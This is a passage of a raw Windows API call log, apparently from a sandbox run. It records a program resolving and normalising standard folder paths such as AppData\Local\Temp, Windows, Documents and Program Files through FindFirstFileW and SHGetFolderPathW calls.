(in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\") returned 1 [0077.440] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfm~1", psz="appdata", len=0x7 | out: pbstr=0x28fae8*="appdata") returned 1 [0077.440] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\appdata" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0xe3c308 [0077.441] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0 [0077.441] GetLastError () returned 0x12 [0077.441] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.441] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData") returned 1 [0077.441] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData", psz="c:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0077.441] SysReAllocStringLen (in: pbstr=0x28fae8*="appdata", psz="local", len=0x5 | out: pbstr=0x28fae8*="local") returned 1 [0077.441] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0xe3c308 [0077.441] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0 [0077.442] GetLastError () returned 0x12 [0077.442] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.442] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0077.442] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0077.442] SysReAllocStringLen (in: pbstr=0x28fae8*="local", psz="temp", len=0x4 | out: pbstr=0x28fae8*="temp") returned 1 [0077.442] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\AppData\\Local\\temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe54b47c0, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xe54b47c0, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0xe3c308 [0077.442] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe54b47c0, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xe54b47c0, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0077.443] GetLastError () returned 0x12 [0077.443] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.443] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0077.443] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0077.444] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0077.444] SysReAllocStringLen (in: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fe44*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0077.445] SysReAllocStringLen (in: pbstr=0x28fe48*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fe48*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0077.445] SysReAllocStringLen (in: pbstr=0x3320064*=0x0, psz="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x3320064*="c:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0077.445] GetWindowsDirectoryW (in: lpBuffer=0x3323b80, uSize=0xfffe | out: lpBuffer="C:\\Windows") returned 0xa [0077.445] CharLowerBuffW (in: lpsz="C:\\Windows", cchLength=0xa | out: lpsz="c:\\windows") returned 0xa [0077.445] SysReAllocStringLen (in: pbstr=0x332009c*=0x0, psz="c:\\windows", len=0xa | out: pbstr=0x332009c*="c:\\windows") returned 1 [0077.445] SysReAllocStringLen (in: pbstr=0x33200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33200a0*="c:") returned 1 [0077.446] SysReAllocStringLen (in: pbstr=0x33200c0*=0x0, psz="windows", len=0x7 | out: pbstr=0x33200c0*="windows") returned 1 [0077.446] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.446] SysReAllocStringLen (in: pbstr=0x28fe38*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe38*="c:\\") returned 1 [0077.446] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="windows", len=0x7 | out: pbstr=0x28fae8*="windows") returned 1 [0077.446] FindFirstFileW (in: lpFileName="c:\\windows" (normalized: "c:\\windows"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xcd2c7d80, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xcd2c7d80, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0xe3c308 [0077.447] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xcd2c7d80, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xcd2c7d80, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0077.447] GetLastError () returned 0x12 [0077.447] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.447] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x28fadc*="c:\\Windows") returned 1 [0077.447] SysReAllocStringLen (in: pbstr=0x28fe38*="c:\\Windows", psz="c:\\Windows\\", len=0xb | out: pbstr=0x28fe38*="c:\\Windows\\") returned 1 [0077.447] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Windows\\", len=0xb | out: pbstr=0x28fad8*="c:\\Windows\\") returned 1 [0077.447] SysReAllocStringLen (in: pbstr=0x28fe38*="c:\\Windows\\", psz="c:\\Windows", len=0xa | out: pbstr=0x28fe38*="c:\\Windows") returned 1 [0077.448] SysReAllocStringLen (in: pbstr=0x28fe3c*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x28fe3c*="c:\\Windows") returned 1 [0077.448] SysReAllocStringLen (in: pbstr=0x3320054*=0x0, psz="c:\\Windows\\", len=0xb | out: pbstr=0x3320054*="c:\\Windows\\") returned 1 [0077.448] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x3323b80 | out: pszPath="C:\\Users\\kEecfMwgj\\Documents") returned 0x0 [0077.448] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Documents", cchLength=0x1c | out: lpsz="c:\\users\\keecfmwgj\\documents") returned 0x1c [0077.448] SysReAllocStringLen (in: pbstr=0x332009c*=0x0, psz="c:\\users\\keecfmwgj\\documents", len=0x1c | out: pbstr=0x332009c*="c:\\users\\keecfmwgj\\documents") returned 1 [0077.449] SysReAllocStringLen (in: pbstr=0x33200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33200a0*="c:") returned 1 [0077.449] SysReAllocStringLen (in: pbstr=0x33200c0*=0x0, psz="users", len=0x5 | out: pbstr=0x33200c0*="users") returned 1 [0077.449] SysReAllocStringLen (in: pbstr=0x33200e0*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x33200e0*="keecfmwgj") returned 1 [0077.449] SysReAllocStringLen (in: pbstr=0x33200ec*=0x0, psz="documents", len=0x9 | out: pbstr=0x33200ec*="documents") returned 1 [0077.450] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.450] SysReAllocStringLen (in: pbstr=0x28fe2c*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe2c*="c:\\") returned 1 [0077.450] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0077.450] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0xe3c308 [0077.450] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0077.450] GetLastError () returned 0x12 [0077.450] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.451] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0077.451] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fe2c*="c:\\Users\\") returned 1 [0077.451] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0077.451] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0xe3c308 [0077.451] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0077.451] GetLastError () returned 0x12 [0077.451] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.451] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0077.451] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\") returned 1 [0077.451] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="documents", len=0x9 | out: pbstr=0x28fae8*="documents") returned 1 [0077.452] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\documents" (normalized: "c:\\users\\keecfmwgj\\documents"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7a8ee20, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7a8ee20, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0xe3c308 [0077.452] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7a8ee20, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7a8ee20, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0 [0077.452] GetLastError () returned 0x12 [0077.452] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.452] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\Documents") returned 1 [0077.452] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents", psz="c:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0077.453] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0077.453] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents\\", psz="c:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents") returned 1 [0077.453] SysReAllocStringLen (in: pbstr=0x28fe30*=0x0, psz="c:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fe30*="c:\\Users\\kEecfMwgj\\Documents") returned 1 [0077.453] SysReAllocStringLen (in: pbstr=0x3320050*=0x0, psz="c:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x3320050*="c:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0077.453] SHGetFolderPathW (in: hwnd=0x0, csidl=46, hToken=0x0, dwFlags=0x0, pszPath=0x3323b80 | out: pszPath="C:\\Users\\Public\\Documents") returned 0x0 [0077.453] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents", cchLength=0x19 | out: lpsz="c:\\users\\public\\documents") returned 0x19 [0077.453] SysReAllocStringLen (in: pbstr=0x332009c*=0x0, psz="c:\\users\\public\\documents", len=0x19 | out: pbstr=0x332009c*="c:\\users\\public\\documents") returned 1 [0077.454] SysReAllocStringLen (in: pbstr=0x33200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33200a0*="c:") returned 1 [0077.454] SysReAllocStringLen (in: pbstr=0x33200c0*=0x0, psz="users", len=0x5 | out: pbstr=0x33200c0*="users") returned 1 [0077.455] SysReAllocStringLen (in: pbstr=0x33200e0*=0x0, psz="public", len=0x6 | out: pbstr=0x33200e0*="public") returned 1 [0077.455] SysReAllocStringLen (in: pbstr=0x33200ec*=0x0, psz="documents", len=0x9 | out: pbstr=0x33200ec*="documents") returned 1 [0077.455] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.455] SysReAllocStringLen (in: pbstr=0x28fe20*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe20*="c:\\") returned 1 [0077.455] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0077.455] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0xe3c308 [0077.455] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0077.455] GetLastError () returned 0x12 [0077.456] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.456] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0077.456] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fe20*="c:\\Users\\") returned 1 [0077.456] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="public", len=0x6 | out: pbstr=0x28fae8*="public") returned 1 [0077.456] FindFirstFileW (in: lpFileName="c:\\Users\\public" (normalized: "c:\\users\\public"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0xe3c308 [0077.456] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0077.456] GetLastError () returned 0x12 [0077.456] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.457] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\Public", len=0xf | out: pbstr=0x28fadc*="c:\\Users\\Public") returned 1 [0077.457] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users\\Public", psz="c:\\Users\\Public\\", len=0x10 | out: pbstr=0x28fe20*="c:\\Users\\Public\\") returned 1 [0077.457] SysReAllocStringLen (in: pbstr=0x28fae8*="public", psz="documents", len=0x9 | out: pbstr=0x28fae8*="documents") returned 1 [0077.457] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\documents" (normalized: "c:\\users\\public\\documents"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0xe3c308 [0077.457] FindNextFileW (in: hFindFile=0xe3c308, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0 [0077.457] GetLastError () returned 0x12 [0077.457] FindClose (in: hFindFile=0xe3c308 | out: hFindFile=0xe3c308) returned 1 [0077.457] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\Public\\", psz="c:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fadc*="c:\\Users\\Public\\Documents") returned 1 [0077.458] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users\\Public\\Documents", psz="c:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fe20*="c:\\Users\\Public\\Documents\\") returned 1 [0077.458] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fad8*="c:\\Users\\Public\\Documents\\") returned 1 [0077.458] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users\\Public\\Documents\\", psz="c:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fe20*="c:\\Users\\Public\\Documents") returned 1 [0077.459] SysReAllocStringLen (in: pbstr=0x28fe24*=0x0, psz="c:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fe24*="c:\\Users\\Public\\Documents") returned 1 [0077.459] SysReAllocStringLen (in: pbstr=0x3320068*=0x0, psz="c:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x3320068*="c:\\Users\\Public\\Documents\\") returned 1 [0077.459] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x3323b80 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0077.460] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)", cchLength=0x16 | out: lpsz="c:\\program files (x86)") returned 0x16 [0077.460] SysReAllocStringLen (in: pbstr=0x332009c*=0x0, psz="c:\\program files (x86)", len=0x16 | out: pbstr=0x332009c*="c:\\program files (x86)") returned 1 [0077.460] SysReAllocStringLen (in: pbstr=0x33200a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x33200a0*="c:") returned 1 [0077.460] SysReAllocStringLen (in: pbstr=0x33200c0*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x33200c0*="program files (x86)") returned 1 [0077.461] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0077.461] SysReAllocStringLen (in: pbstr=0x28fe14*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe14*="c:\\") returned 1 [0077.461] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x28fae8*="program files (x86)") returned 1 [0077.461] FindFirstFileW (in: lpFileName="c:\\program files (x86)" (normalized: "c:\\program files (x86)"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0xe3c308 [0077.461] FindNextFileW 